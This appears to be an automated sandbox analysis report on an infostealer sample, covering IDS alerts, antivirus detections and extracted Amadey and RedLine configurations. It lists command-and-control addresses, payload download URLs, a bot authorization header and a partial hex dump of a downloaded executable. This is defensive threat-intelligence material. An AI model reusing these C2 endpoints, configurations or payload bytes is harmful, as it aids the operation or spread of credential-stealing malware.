                              2024-12-13T01:38:55.885915+010028561481A Network Trojan was detected192.168.2.550041185.81.68.14880TCP
                              2024-12-13T01:39:02.226578+010028561481A Network Trojan was detected192.168.2.550058185.81.68.14880TCP
                              2024-12-13T01:39:08.461476+010028561481A Network Trojan was detected192.168.2.550082185.81.68.14880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:39.825443+010028561491A Network Trojan was detected192.168.2.549792185.81.68.14880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:37.541008+010028561501A Network Trojan was detected192.168.2.549780185.81.68.14880TCP
                              2024-12-13T01:37:37.687904+010028561501A Network Trojan was detected192.168.2.549781185.81.68.14880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:40.683961+010028561511A Network Trojan was detected192.168.2.549793185.81.68.14880TCP
                              2024-12-13T01:37:41.037322+010028561511A Network Trojan was detected192.168.2.549794185.81.68.14880TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:30.873651+010028033053Unknown Traffic192.168.2.549753185.81.68.14780TCP
                              2024-12-13T01:37:36.578919+010028033053Unknown Traffic192.168.2.549772185.81.68.14780TCP
                              2024-12-13T01:37:47.205200+010028033053Unknown Traffic192.168.2.549816185.81.68.14780TCP
                              2024-12-13T01:38:01.525345+010028033053Unknown Traffic192.168.2.549867185.81.68.14780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T01:37:36.069997+010028552391A Network Trojan was detected192.168.2.549769185.81.68.14780TCP
                              2024-12-13T01:37:36.156479+010028552391A Network Trojan was detected192.168.2.549770185.81.68.14780TCP
                              2024-12-13T01:37:37.541008+010028552391A Network Trojan was detected192.168.2.549780185.81.68.14880TCP
                              2024-12-13T01:37:37.687904+010028552391A Network Trojan was detected192.168.2.549781185.81.68.14880TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Avira URL Cloud: Label: malware
                              Source: http://185.81.68.147/7vhfjke3/index.php#Avira URL Cloud: Label: malware
                              Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnsAvira URL Cloud: Label: malware
                              Source: http://185.81.68.147/7vhfjke3/index.php?)Avira URL Cloud: Label: malware
                              Source: http://185.81.68.147/7vhfjke3/index.php?(Avira URL Cloud: Label: malware
                              Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1QAvira URL Cloud: Label: malware
                              Source: http://185.81.68.147/gfx.exeAvira URL Cloud: Label: malware
                              Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1gAvira URL Cloud: Label: malware
                              Source: http://185.81.68.147/7vhfjke3/index.php?scr=1Avira URL Cloud: Label: malware
                              Source: 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
                              Source: 17.0.D7AB.tmp.ssg.exe.5c0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                              Source: http://185.81.68.147/7vhfjke3/index.php6Virustotal: Detection: 11%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllReversingLabs: Detection: 47%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllReversingLabs: Detection: 34%
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeReversingLabs: Detection: 28%
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeReversingLabs: Detection: 63%
                              Source: yINR7uQlPr.exeVirustotal: Detection: 40%Perma Link
                              Source: yINR7uQlPr.exeReversingLabs: Detection: 75%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeJoe Sandbox ML: detected
                              Source: yINR7uQlPr.exeJoe Sandbox ML: detected
                              Source: yINR7uQlPr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245746365.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246067900.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: System.ServiceModel.pdb; source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241284492.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ucrtbase.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241984834.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240794322.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243521311.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244768009.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246183677.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmp
                              Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241592467.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243911711.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243013801.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244627444.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241018419.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: vcruntime140.amd64.pdbGCTL source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
                              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242374350.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240577463.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241164887.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244255606.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbj source: D7AB.tmp.ssg.exe, 00000011.00000002.2662161359.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242660001.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ucrtbase.pdbUGP source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: vcruntime140.amd64.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
                              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246391912.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: softy.pdbat.6 source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241491504.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243251482.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mscorlib.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242215513.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240684273.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244077458.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ion.pdb} source: powershell.exe, 00000020.00000002.2602449809.00000219A8BAA000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2269356516.00007FF8A87CD000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241882128.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245858639.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242520362.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242085986.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246488809.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb- source: powershell.exe, 00000020.00000002.2612134704.00000219A8FE3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242778373.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243738070.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242897832.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mscorlib.pdb source: powershell.exe, 00000020.00000002.2607042832.00000219A8ED5000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241382996.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245955915.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241786754.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241692866.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244947833.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246284261.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,11_2_00007FF6900179B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900185A0 FindFirstFileExW,FindClose,11_2_00007FF6900185A0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00007FF690030B84
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900185A0 FindFirstFileExW,FindClose,16_2_00007FF6900185A0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF6900179B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF690030B84
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF8B837303C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF8B8373280
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006CF661 FindFirstFileExW,18_2_006CF661
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007DF661 FindFirstFileExW,19_2_007DF661
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007B8430 GetTempPathA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindClose,20_2_007B8430
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007DF661 FindFirstFileExW,20_2_007DF661
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_6971BCEE FindFirstFileExW,29_2_6971BCEE
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.ini
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49738 -> 185.81.68.147:1912
                              Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49738 -> 185.81.68.147:1912
                              Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.5:49738
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49752 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.5:49738
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49761 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49770 -> 185.81.68.147:80
                              Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49769 -> 185.81.68.147:80
                              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49775 -> 185.81.68.147:80
                              Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49780 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.5:49780 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.5:49781 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.5:49781 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49792 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856149 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M5 : 192.168.2.5:49792 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49791 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.5:49794 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.5:49793 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49813 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49832 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49857 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49876 -> 185.81.68.147:1912
                              Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49876 -> 185.81.68.147:1912
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49877 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.5:49876
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49900 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.5:49876
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49922 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49962 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49943 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49983 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50041 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50023 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50082 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50058 -> 185.81.68.148:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:50002 -> 185.81.68.148:80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80
                              Source: Malware configuration extractorIPs: 185.81.68.148
                              Source: Malware configuration extractorURLs: 185.81.68.147:1912
                              Source: global trafficTCP traffic: 192.168.2.5:49738 -> 185.81.68.147:1912
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 08:37:05 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 10 Dec 2024 15:45:48 GMTETag: "5a452c-628ec5ffff268"Accept-Ranges: bytesContent-Length: 5915948Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 